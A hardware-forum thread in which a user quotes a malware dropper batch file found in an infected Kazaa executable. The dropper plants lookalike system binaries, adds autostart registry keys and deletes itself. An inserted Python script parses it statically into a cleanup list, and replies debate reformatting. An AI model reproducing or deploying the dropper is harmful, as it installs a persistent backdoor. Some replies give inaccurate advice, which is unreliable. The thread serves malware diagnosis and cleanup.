Thread: r00ted?

  1. #1
    Senior Member Nemeliza's Avatar
    Join Date
    Jul 2003
    Posts
    1,719
    Thanks
    1
    Thanked
    5 times in 5 posts

    r00ted?

    Hey,

    Just been to a friend's house to clean up his comp when, after running Ad-Aware and removing 308 spy/adware applications,
    I found this in a bat file hidden in his auto-executing Kazaa exe file.
    Code:
    @echo off
    mkdir %SystemRoot%\system32\dllcache\I386
    mkdir %systemroot%\system32\dllcache\I386\pax
    copy svchost.exe %SystemRoot%\system32\dllcache
    copy cygwin1.dll %SystemRoot%\system32\dllcache
    copy TzoLibr.dll %SystemRoot%\system32\dllcache
    copy libeay32.dll %SystemRoot%\system32\dllcache
    copy SPOOLSVC.exe %SystemRoot%\system32\dllcache
    copy ServUDaemon.ini %SystemRoot%\system32\dllcache
    copy ogm.dll %SystemRoot%\system32\dllcache\I386\pax
    del svchost.exe
    del cygwin1.dll
    del ogm.dll
    del SPOOLSVC.exe
    del TzoLibr.dll
    del libeay32.dll
    del ServUDaemon.ini
    reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v System /t REG_SZ /d "%SystemRoot%\system32\dllcache\svchost.exe -b %SystemRoot%\system32\dllcache\I386\pax\ogm.dll" /f
    reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SystemData /t REG_SZ /d "%SystemRoot%\system32\dllcache\SPOOLSVC.exe" /f
    call klr247.exe
    del ogm.bat
    cd %SystemRoot%\system32\dllcache
    SPOOLSVC.exe

    After laughing and telling him he has been rooted... he responded with 'I've been what now'.
    I have found all the files it copied as well as the directory and the registry keys and just wanted to know if it's OK to just delete it all. Is there anything else hidden in here that requires special attention?

    Thanks.
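To turn a dropper like the one above into a cleanup list without running it, a static parse of the batch file is enough. The script below is an added example written for this thread, not something posted by Nemeliza or shipped with any tool: it reads the batch text (the thread's script is embedded as a constructed sample), records what the script creates, copies, deletes, writes to the registry and executes, and then flags the bits a responder cares about: Run-key entries that launch something out of `system32\dllcache`, dropped files whose names imitate real Windows binaries, and the self-delete of the `.bat`. It assumes `%SystemRoot%` expands to `C:\WINDOWS`, which is only a default for reporting; the helper names (`parse_dropper`, `persistence_indicators`, `cleanup_checklist`, and so on) are mine.

```python
"""Static triage of a batch-file dropper (added example; not code from the thread)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample input: the dropper quoted in the thread, blank lines removed.
SAMPLE_DROPPER = r"""@echo off
mkdir %SystemRoot%\system32\dllcache\I386
mkdir %systemroot%\system32\dllcache\I386\pax
copy svchost.exe %SystemRoot%\system32\dllcache
copy cygwin1.dll %SystemRoot%\system32\dllcache
copy TzoLibr.dll %SystemRoot%\system32\dllcache
copy libeay32.dll %SystemRoot%\system32\dllcache
copy SPOOLSVC.exe %SystemRoot%\system32\dllcache
copy ServUDaemon.ini %SystemRoot%\system32\dllcache
copy ogm.dll %SystemRoot%\system32\dllcache\I386\pax
del svchost.exe
del cygwin1.dll
del ogm.dll
del SPOOLSVC.exe
del TzoLibr.dll
del libeay32.dll
del ServUDaemon.ini
reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v System /t REG_SZ /d "%SystemRoot%\system32\dllcache\svchost.exe -b %SystemRoot%\system32\dllcache\I386\pax\ogm.dll" /f
reg add "hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SystemData /t REG_SZ /d "%SystemRoot%\system32\dllcache\SPOOLSVC.exe" /f
call klr247.exe
del ogm.bat
cd %SystemRoot%\system32\dllcache
SPOOLSVC.exe
"""

# reg add "<key>" /v <name> /t <type> /d "<data>"  (the form the dropper uses)
REG_ADD_RE = re.compile(
    r'^reg\s+add\s+"?(?P<key>[^"\s]+)"?\s+/v\s+(?P<name>\S+)\s+/t\s+(?P<type>\S+)\s+/d\s+"(?P<data>[^"]*)"',
    re.IGNORECASE,
)
AUTOSTART_KEYS = (
    "software\\microsoft\\windows\\currentversion\\run",
    "software\\microsoft\\windows\\currentversion\\runonce",
)
# Real Windows binary names the dropped files reuse or imitate.
KNOWN_WINDOWS_BINARIES = {"svchost.exe", "spoolsv.exe"}


@dataclass
class DropperReport:
    dirs_created: List[str] = field(default_factory=list)
    files_copied: List[Tuple[str, str]] = field(default_factory=list)   # (source, dest dir)
    files_deleted: List[str] = field(default_factory=list)
    registry_writes: List[Tuple[str, str, str]] = field(default_factory=list)  # (key, value, data)
    executed: List[str] = field(default_factory=list)


def parse_dropper(text: str) -> DropperReport:
    """Walk the batch file line by line and record each side effect it would have."""
    report = DropperReport()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith("@echo"):
            continue
        verb, _, rest = line.partition(" ")
        verb, rest = verb.lower(), rest.strip()
        if verb == "mkdir":
            report.dirs_created.append(rest)
        elif verb == "copy":
            src, _, dst = rest.partition(" ")
            report.files_copied.append((src, dst.strip()))
        elif verb == "del":
            report.files_deleted.append(rest)
        elif verb == "reg":
            m = REG_ADD_RE.match(line)
            if m:
                report.registry_writes.append((m["key"], m["name"], m["data"]))
        elif verb == "call":
            report.executed.append(rest)
        elif verb == "cd":
            pass  # only changes the working directory; leaves no artefact
        else:
            report.executed.append(line)  # bare program invocation, e.g. SPOOLSVC.exe
    return report


def expand_env(s: str, systemroot: str = "C:\\WINDOWS") -> str:
    """Expand %SystemRoot% case-insensitively, as cmd.exe does (default path is an assumption)."""
    return re.sub(r"%systemroot%", lambda _: systemroot, s, flags=re.IGNORECASE)


def persistence_indicators(report: DropperReport) -> List[Tuple[str, str]]:
    """Run/RunOnce values whose command launches something from dllcache."""
    return [(name, data) for key, name, data in report.registry_writes
            if any(key.lower().endswith(k) for k in AUTOSTART_KEYS) and "dllcache" in data.lower()]


def lookalike_names(report: DropperReport) -> List[str]:
    """Dropped files named exactly like, or one letter away from, a real Windows binary."""
    hits = []
    for src, _ in report.files_copied:
        stem, _, ext = src.lower().rpartition(".")
        for real in KNOWN_WINDOWS_BINARIES:
            rstem = real[:-4]
            if src.lower() == real or (ext == "exe" and stem.startswith(rstem) and stem != rstem):
                hits.append(src)
                break
    return hits


def cleanup_checklist(report: DropperReport, systemroot: str = "C:\\WINDOWS") -> Dict[str, List[str]]:
    """Everything the script left behind: dropped files, directories, registry values."""
    return {
        "files": [expand_env(dst + "\\" + src, systemroot) for src, dst in report.files_copied],
        "dirs": [expand_env(d, systemroot) for d in report.dirs_created],
        "registry_values": [key + " /v " + name for key, name, _ in report.registry_writes],
        "self_delete": [f for f in report.files_deleted if f.lower().endswith(".bat")],
    }


if __name__ == "__main__":
    rep = parse_dropper(SAMPLE_DROPPER)
    for k, v in cleanup_checklist(rep).items():
        print(k, v)
    print("autostart from dllcache:", persistence_indicators(rep))
    print("lookalike names:", lookalike_names(rep))
    print("executed:", rep.executed)
```

Running it against the sample lists the seven dropped files with their full dllcache paths, the two directories, the two `Run` values (`System` and `SystemData`), the two lookalike names (`svchost.exe` and `SPOOLSVC.exe`), and the `ogm.bat` self-delete; that list is exactly what needs to go if you choose to clean rather than reinstall.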

  2. #2
    Comfortably Numb directhex's Avatar
    Join Date
    Jul 2003
    Location
    /dev/urandom
    Posts
    17,074
    Thanks
    228
    Thanked
    1,027 times in 678 posts
    • directhex's system
      • Motherboard:
      • Asus ROG Strix B550-I Gaming
      • CPU:
      • Ryzen 5900x
      • Memory:
      • 64GB G.Skill Trident Z RGB
      • Storage:
      • 2TB Seagate Firecuda 520
      • Graphics card(s):
      • EVGA GeForce RTX 3080 XC3 Ultra
      • PSU:
      • EVGA SuperNOVA 850W G3
      • Case:
      • NZXT H210i
      • Operating System:
      • Ubuntu 20.04, Windows 10
      • Monitor(s):
      • LG 34GN850
      • Internet:
      • FIOS
    nope, they're all critical operating system files which have been replaced with virus-infected versions - or more to the point, the backups have been altered, and the originals deleted so Windows automatically syncs to the infected versions

    101% rooted

    format is the only way
    nice rootkit! /me is impressed

  3. #3
    Chaos Monkey Apex's Avatar
    Join Date
    Jul 2003
    Location
    Huddersfield
    Posts
    4,528
    Thanks
    957
    Thanked
    233 times in 163 posts
    • Apex's system
      • Motherboard:
      • Asus Z87M-PLUS
      • CPU:
      • Intel i5-4670K
      • Memory:
      • 32 GiB
      • Storage:
      • 14 TiB
      • Graphics card(s):
      • R9 480X 8Gib
      • PSU:
      • 750
      • Case:
      • Core View 21
      • Operating System:
      • Windows 10 pro
      • Monitor(s):
      • Dell S2721DGFA
      • Internet:
      • 200Mb nTL Cable
    Unless he cba to copy ones from an uninfected machine, format is the only way



  4. #4
    Comfortably Numb directhex's Avatar
    Join Date
    Jul 2003
    Location
    /dev/urandom
    Posts
    17,074
    Thanks
    228
    Thanked
    1,027 times in 678 posts
    spoolsvc.exe is the printer back-end, svchost.exe is the service host exe & runs _EVERYTHING_ under nt.

  5. #5
    Chaos Monkey Apex's Avatar
    Join Date
    Jul 2003
    Location
    Huddersfield
    Posts
    4,528
    Thanks
    957
    Thanked
    233 times in 163 posts
    WinInternals Admin pack would allow him to replace the files.



  6. #6
    Sublime HEXUS.net
    Join Date
    Jul 2003
    Location
    The Void.. Floating
    Posts
    11,819
    Thanks
    213
    Thanked
    233 times in 160 posts
    • Stoo's system
      • Motherboard:
      • Mac Pro
      • CPU:
      • 2*Xeon 5450 @ 2.8GHz, 12MB Cache
      • Memory:
      • 32GB 1600MHz FBDIMM
      • Storage:
      • ~ 2.5TB + 4TB external array
      • Graphics card(s):
      • ATI Radeon HD 4870
      • Case:
      • Mac Pro
      • Operating System:
      • OS X 10.7
      • Monitor(s):
      • 24" Samsung 244T Black
      • Internet:
      • Zen Max Pro
    "replace" would work too
    (\__/)
    (='.'=)
    (")_(")

  7. #7
    Comfortably Numb directhex's Avatar
    Join Date
    Jul 2003
    Location
    /dev/urandom
    Posts
    17,074
    Thanks
    228
    Thanked
    1,027 times in 678 posts
    it's not a production-vital server, just format the bastard :|

  8. #8
    Sublime HEXUS.net
    Join Date
    Jul 2003
    Location
    The Void.. Floating
    Posts
    11,819
    Thanks
    213
    Thanked
    233 times in 160 posts
    Because it might not be practical to flatten it?

  9. #9
    Commander Keen
    Join Date
    Nov 2003
    Location
    217.27.240.214
    Posts
    624
    Thanks
    0
    Thanked
    0 times in 0 posts
    yeah.. and install a firewall !! And run spybot first thing before going on the net so that it can do the adware "hardening" <- *sniggers*

    then make the bugger use firefox because it r0x and it blocks !

    Then install skype, and get a microphone because I want somebody to try it out with !!!
